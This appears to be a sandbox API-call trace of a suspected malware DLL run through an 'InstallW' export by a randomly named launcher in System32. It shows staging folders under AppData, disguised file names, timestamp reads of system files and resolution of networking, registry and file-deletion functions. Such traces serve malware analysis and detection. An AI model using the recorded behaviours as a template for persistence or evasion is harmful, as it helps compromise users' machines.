[0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.023] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.023] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.023] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.024] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afa48 | out: lpSystemTimeAsFileTime=0x2afa48*(dwLowDateTime=0xe0ce9370, dwHighDateTime=0x1d3dfba)) [0032.024] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2af980, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.024] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2af868, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.024] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetLastError () returned 0x0 [0032.025] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.025] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.025] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.025] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.025] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.025] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.025] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.025] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.025] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.025] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.026] GetLastError () returned 0xb7 [0032.026] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.026] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.026] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.026] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.033] wsprintfA (in: param_1=0x2af6e8, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.033] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.033] wsprintfA (in: param_1=0x2af5e4, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.033] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.033] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.034] CloseHandle (hObject=0x74) returned 1 [0032.034] GetLastError () returned 0x0 [0032.034] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.034] GetLastError () returned 0x0 [0032.034] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.034] GetSystemDirectoryA (in: lpBuffer=0x2af6e8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.034] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.034] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.034] CloseHandle (hObject=0x74) returned 1 [0032.034] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.034] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.034] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.036] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.036] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.036] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.036] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.036] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.036] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.036] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.036] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.036] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.036] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.036] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.036] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.037] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.038] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.038] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.038] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.038] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.038] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.038] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.038] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.038] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.038] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.038] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.038] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.038] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.038] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.038] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.038] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.038] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.038] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.038] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.038] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.039] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.039] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.039] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.039] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.039] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.039] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.039] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.039] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.039] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.039] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.039] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.039] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.039] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.039] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.039] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.039] Entry () [0032.039] GetMessageA (lpMsg=0x2afd6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 149 os_tid = 0xde0 [0036.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.551] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.551] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.551] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.551] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.551] GetCurrentThreadId () returned 0xde0 Process: id = "17" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f880" os_pid = "0xb1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"0\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 857 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 858 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 859 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 860 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 861 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 862 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 863 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 864 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 865 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 866 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 867 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 868 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 869 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 870 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 871 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 872 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 873 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 874 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 875 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 876 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 877 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 878 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 879 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 880 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 881 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 882 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 883 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 884 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 885 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 886 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 887 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 888 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 889 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 890 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 891 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 892 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 893 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 894 start_va = 0x5f0000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 895 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 896 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 897 start_va = 0x7c0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Thread: id = 40 os_tid = 0xb20 [0032.073] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef85c | out: lpSystemTimeAsFileTime=0x2ef85c*(dwLowDateTime=0xe0d818f0, dwHighDateTime=0x1d3dfba)) [0032.073] GetCurrentProcessId () returned 0xb1c [0032.073] GetCurrentThreadId () returned 0xb20 [0032.073] GetTickCount () returned 0x172de [0032.073] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef854 | out: lpPerformanceCount=0x2ef854*=362533561) returned 1 [0032.074] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.074] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.074] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.074] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.074] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.074] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.074] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.074] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.075] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.075] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.075] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.075] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.075] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.075] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.075] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.075] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.075] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.075] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.075] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.076] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.076] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.076] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.076] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.076] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.076] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.076] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.076] GetCurrentThreadId () returned 0xb20 [0032.076] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"0\"" [0032.076] GetEnvironmentStringsW () returned 0x3f78b8* [0032.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x7b09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.076] FreeEnvironmentStringsW (penv=0x3f78b8) returned 1 [0032.077] GetStartupInfoA (in: lpStartupInfo=0x2ef7ac | out: lpStartupInfo=0x2ef7ac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.077] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.077] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.077] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.077] SetHandleCount (uNumber=0x20) returned 0x20 [0032.077] GetLastError () returned 0x0 [0032.077] SetLastError (dwErrCode=0x0) [0032.077] GetLastError () returned 0x0 [0032.077] SetLastError (dwErrCode=0x0) [0032.077] GetLastError () returned 0x0 [0032.077] SetLastError 